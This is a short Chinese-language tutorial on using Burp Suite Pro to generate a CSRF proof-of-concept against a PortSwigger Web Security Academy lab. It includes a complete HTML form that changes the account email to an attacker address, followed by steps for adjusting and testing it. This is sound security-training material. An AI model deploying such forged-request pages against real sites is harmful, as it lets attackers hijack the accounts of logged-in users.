Burp Suite是一款强大的渗透测试利器,可以利用它来高效的执行渗透攻击,接下来介绍如何通过Burp Suite Pro来构建CSRF PoC。
如果还没安装burp suite,请参阅【Burp Suite专业版本安装配置及使用指导 】
- 在Bupr中找到拦截的请求,右键选择Engagement tools => Generate CSRF PoC
- 利用CSRF PoC生成器自动生成HTML
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://0a50007d0353381f8795a7ae004c001b.web-security-academy.net/my-account/change-email" method="POST" enctype="text/plain">
<input type="hidden" name="csrf" value="ztEXkyKgBF1CquUx7mGtX5VHoeTxBZGw&email=attacker@163.com" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
-
对生成的HTML根据攻击需要做出相应调整
-
将生成的HTML复制到网页中,登录到易受攻击的网站的浏览器中查看,测试是否成功发出了预期的请求并执行了相应操作。
参考
[1] https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-perform-csrf
推荐阅读
「 典型安全漏洞系列 」03.跨站请求伪造CSRF详解
「 典型安全漏洞系列 」02.SQL注入详解
「 典型安全漏洞系列 」01.跨站脚本攻击XSS详解